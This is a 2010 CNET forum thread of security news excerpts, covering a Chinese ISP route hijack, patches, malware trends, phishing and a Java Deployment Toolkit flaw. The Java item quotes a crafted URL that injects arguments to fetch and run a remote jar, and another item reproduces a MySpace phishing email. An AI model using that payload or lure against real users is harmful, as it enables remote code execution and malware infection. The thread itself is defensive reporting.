General discussion

NEWS - April 09, 2010

Chinese ISP hijacks the Internet, momentarily

"Dell, Apple, Starbucks and CNN web traffic was redirected to China"

For the second time in two weeks, bad networking information spreading from China has disrupted the Internet.

On Thursday morning, bad routing data from a small Chinese ISP called IDC China Telecommunication was re-transmitted by China's state-owned China Telecommunications, and then spread around the Internet, affecting Internet service providers such as AT&T, Level3, Deutsche Telekom, Qwest Communications and Telefonica.

"There are a large number of ISPs who accepted these routes all over the world," said Martin A. Brown, technical lead at Internet monitoring firm Renesys.

According to Brown, the incident started just before 10am Eastern Time on Thursday and lasted about 20 minutes. During that time IDC China Telecommunication transmitted bad routing information for between 32,000 and 37,000 networks, redirecting them to IDC China Telecommunication instead of their rightful owners.

These networks included about 8,000 US networks including those operated by Dell, CNN, Starbucks and Apple. More than 8,500 Chinese networks,1,100 in Australia and 230 owned by France Telecom were also affected.

Continued here: http://news.techworld.com/networking/3219752/chinese-isp-hijacks-the-internet-momentarily/
Discussion is locked
Follow
Reply to: NEWS - April 09, 2010
PLEASE NOTE: Do not post advertisements, offensive materials, profanity, or personal attacks. Please remember to be considerate of other members. If you are new to the CNET Forums, please read our CNET Forums FAQ. All submitted content is subject to our Terms of Use.
Reporting: NEWS - April 09, 2010
This post has been flagged and will be reviewed by our staff. Thank you for helping us maintain CNET's great community.
Sorry, there was a problem flagging this post. Please try again now or at a later time.
If you believe this post is offensive or violates the CNET Forums' Usage policies, you can report it below (this will not automatically remove the post). Once reported, our moderators will be notified and the post will be reviewed.
Comments
- Collapse -
Microsoft finally to close the VBScript hole in IE

"Microsoft finally to close the VBScript hole in Internet Explorer "

Next Tuesday, Microsoft plans to release eleven updates to close 25 security holes, including the VBScript hole in Internet Explorer that has been known for about six weeks and the DoS vulnerability in the SMB client of Windows 7 and Server 2008 disclosed in November 2009.

The updates will also fix other holes in Windows (2000 to Server 2008), Office (Publisher and Visio) and in Exchange Server (2000 to 2010). Microsoft has given top priority to five of the eleven updates because they close critical holes.

The Internet Explorer hole which involves the processing of certain UNC paths and has been known since January appears to remain unpatched. It mainly affects pre-Vista systems; on Vista and Windows 7, Internet Explorer (7 and Cool runs in protected mode, which prevents attackers from exploiting the hole.

Microsoft has also pointed out that the support of several Windows versions will be discontinued this year. No further updates for Windows 2000 will be released from the 13th of July, 2010. Windows XP Service Pack 2 will only be supported until the 13th of July, 2010. It is therefore advisable to update to SP3. Windows Vista RTM will only be supported until the 13th of April, 2010, while the support of Vista SP1 will continue until the 12th of July, 2011.

Here: http://www.h-online.com/security/news/item/Microsoft-finally-to-close-the-VBScript-hole-in-Internet-Explorer-973954.html

- Collapse -
Tiger Woods (Searches) Not to Be Trusted

From the Threat Center Live Blog:

Tiger Woods? personal life and marital affairs have attracted constant attention from the press and has certainly damaged his public reputation. With his return to the Masters only days away, Nike has released a new commercial in an effort to rebuild Woods? image. This compelling commercial is intended to spark a reaction, and may well be the next thing you talk about at the office water cooler. Anyone who hasn?t seen it will go right back to their desk and search for the video. Blackhats have once again worked their way into these search results, leading users to malicious sites and Rogue Anti-Virus downloads.

A user looking to see the commercial online would likely search ?tiger woods commercial? ? the search is heavily poisoned. Out of the top 7 search results, six lead to Fake Anti-Virus pages begging the user to install malicious software. The video results have also been poisoned to do the same. [...]

Continued here: http://threatcenter.blogspot.com/2010/04/tiger-woods-searches-not-to-be-trusted.html

- Collapse -
This PC Will Self-Destruct in Ten Seconds

From the Webroot Threat Blog:

Phishing Trojans that try to remain below the radar are still prevalent, but a number of files coming through Threat Research point to a disturbing trend: Several new variants of existing malware families are taking a scorched earth approach to infected computers, rendering the PC unbootable (just check out the batch file at left for just one egregious example) once the malware has retrieved whatever data it?s trying to steal, or deliberately crashing it, repeatedly, if you try to remove it.

Since the middle of last year, we?ve seen a sprinkling of malware that also wipes out key files on the hard drive, sometimes preventing a reboot, after an infection. This isn?t hostageware, which overtly threatens to delete the contents of the hard drive if you don?t pay up, but something more sinister.

In some cases, the crashes we saw were the result of poor coding by the malware author. But increasingly it appears that this behavior is deliberate, and occurs without warning. And this unfortunate trend appears to be getting worse, leaving a raft of perplexed, angry victims unable to use their computers in the wake of an infection.

The commands within malware capable of rendering infected machines inoperable was first documented in detail last year. But recent files added to at least two of our definitions, Trojan-Downloader-Tacticlol and Trojan-Backdoor-Zbot, indicate that someone has begun to use this functionality.

Continued here: http://blog.webroot.com/2010/04/08/this-pc-will-self-destruct-in-ten-seconds/

- Collapse -
Trojanised Mobile Phone Game Makes Expensive Phone Calls

From the F-Secure Weblog:

We have received reports of a malicious Windows Mobile game that creates significant phone bills to affected users.

The game in question is called 3D Anti-terrorist action, and it's manufactured by Beijing Huike Technology in China. [...]

The game itself is a 3D first-person shooter. [...]

Apparently some Russian malware author took the game and trojanized it. Then he uploaded the trojanized version to several Windows Mobile freeware download sites.

Quite quickly people started reporting that the phone was making expensive calls on it's own.

Here's an example of a thread on the XDA-Developers forum: [...]

Continued here: http://www.f-secure.com/weblog/archives/00001930.html

Also See: The mobile game with a Trojan thrown in for free

- Collapse -
Beware MySpace Password Reset Confirmation malware attack

From Graham Cluley's Blog:

Malicious hackers are spamming out messages claiming to come from MySpace's support team, informing unsuspecting users that as a "safety" measure their password has been changed.

Of course, the emails aren't really from support@myspace.com, and users who open the attached file risk infecting their computer with malware. [...]

A typical email looks like the following:

Subject: Myspace Password Reset Confirmation! Your Support
Attached file: password.zip
Message body:

Hey <name1@example.com>,
<name2@example.com>,
<name3@example.com>,
<name4@example.com>,

Because of the measures taken to provide safety to our clients, your password has been changed. You can find your new password in attached document.

Thanks,
The Myspace Team.


Continued here: http://www.sophos.com/blogs/gc/g/2010/04/09/beware-myspace-password-reset-confirmation-malware-attack/

- Collapse -
ID Thieves Filed for $4 Million in Tax Refunds Using Names..
Identity Thieves Filed for $4 Million in Tax Refunds Using Names of Living and Dead

A group of sophisticated identity thieves managed to steal millions of dollars by filing bogus tax returns using the names and Social Security numbers of other people, many of them deceased, according to a 74-count indictment unsealed in Arizona Thursday.

The thieves operated their scheme for at least three years from January 2005 to April 2008, allegedly filing more than 1,900 fraudulent tax returns involving about $4 million in refunds directed to more than 170 bank accounts. The conspirators used numerous fake IDs to open internet and phone accounts, and also used more than 175 different IP addresses around the United States to file the fake returns, which were often filed in bulk as if through an automated process.

According to authorities a Californian, 29-year-old self-described hacker named Daniel David Rigmaiden, aka Steven Travis Brawner, was the ringleader of the group. He conspired with Ransom Marion Carter, III, 43 of Arizona and at least one other conspirator who was arrested in Utah in 2008 but has not been identified in court records.

Continued here: http://www.wired.com/threatlevel/2010/04/fake-tax-returns/
- Collapse -
New healthcare IT compliance service protects EMR's
New healthcare IT compliance service protects electronic medical records

I've been seeing the same general practice doctor for about 15 years. The last time I saw him, I noticed he carried a tablet PC instead of the usual thick paper-based folder full of my medical records. I commented on the switch to electronic medical records (EMR) and he said, "I was a holdout but my staff forced me into it."

He's not the only doctor to be toting a tablet PC instead of a plain old tablet of paper. The Congressional Budget Office forecasts that 90 percent of doctors and 70 percent of hospitals will be using comprehensive EMR within the next decade. Government stimulus incentives as high as $44,000 per physician are encouraging medical practitioners to adopt EMR technology. The hope is that electronic records will reduce healthcare costs as well as medical errors.

The movement toward electronic health records is both encouraging and frightening. On the plus side, I like that my digital health records can easily be shared with other physicians should the need arise. In an emergency, I'd want my attending physician to know as much about me as possible without having to wait for a copy of paper records.

On the down side, however, I'm concerned about the possibility of a data breach. Apparently this concern is warranted. According to market research firm Javelin Strategy & Research, data theft and other fraudulent activities related to the exposure of EMR data more than doubled in 2009. There were more than 275,000 cases of theft of medical information in the United States in 2009. Javelin expects that incidents of fraud will continue to increase as more medical providers increase their use of EMR.

http://www.networkworld.com/newsletters/techexec/2010/041210bestpractices.html
- Collapse -
The botnet economy

It is somewhat difficult for us - the potential victims - to appreciate the effectiveness of the various botnets and to aknowledge that the botnet masters have managed to work together beautifully.

Loucif Kharouni, a threat analyst with TrendLabs, decided to enlighten us and give us a overview of the spreading and the (inter)operating mechanisms of the major botnets: [...]

The tagged figures are the botnets. Going from left to right, the turquoise ones are primary, the red - secondary, and FakeAV (in blue) is tertiary. The different arrow colors represent the methods of threat delivery: green is for spam, and purple stands for "pay per install".

That means that Cutwail uses email spam to spread malicious files related to Sasfis, ZeuS and FakeAV, and that Bredo downloads variants of all the other botnets.

What does that mean for us? It means that it you find, for example, Bredo (which is a downloader) on your system, it is probable that at least two types of malware has been installed, and it's even possible that ALL the other malware is present on your system.

What does that mean for the botnet masters? It means that everyone has their function and their source of income - their place in this malicious ecosystem.

Continued here: http://www.net-security.org/secworld.php?id=9121

- Collapse -
Java (JDT) exploit launches local Windows applications

Tavis Ormandy has discovered a security vulnerability in the Java Deployment Toolkit (JDT) which can be exploited to launch arbitrary applications on a Windows system using a crafted website. The vulnerability could, for example, be used to download and run a trojan via FTP. JDT has been installed as part of Java since Java 6 Update 10. It is intended to make it easier for developers to distribute applications. According to Ormandy, the problem is the result of insufficient filtering of URLs, allowing arbitrary parameters to be fed to Java Web Start (JWS). JWS is able to download external Java applications using the Java Network Launching Protocol (JNLP) and run them in the VM.

By feeding crafted URLs (e.g. http: -J-jar -J\\\\www.example.com\\exploit.jar none) to the launch function, it is possible to download additional Java code and cause the Java VM to launch local applications with the user's privileges. Ormandy has published a demo exploit which downloads the file calc.jar, which launches the calculator from the command line.

In a quick test carried out by the heise Security editorial team, on a system running Windows XP, Java 6 Update 16 and Internet Explorer 8, it did indeed launch the calculator. On a Windows 7 system with IE 8, however, the Java VM merely displayed an error message. The exploit is also reported to work with Firefox (under Windows), but failed to do so in our tests.

Ormandy says he has informed Sun (now Oracle) of the problem. According to his report, Sun did not consider the vulnerability to be sufficiently critical to release an emergency patch outside of its three-month patch cycle. Until an update is released, Ormandy is advising users to set the kill bit for the JDT ActiveX control. This can either be performed manually, as described by Microsoft, or rather more simply using the AxBan tool. The CLSID for the control is CAFEEFAC-DEC7-0000-0000-ABCDEFFEDCBA. For Firefox, restricting access to npdeploytk.dll should block the exploit.

From: http://www.h-online.com/security/news/item/Java-exploit-launches-local-Windows-applications-974652.html

More Details in Tavis Ormandy's Security Advisory: Java Deployment Toolkit Performs Insufficient Validation of Parameters,

CNET Forums

Forum Info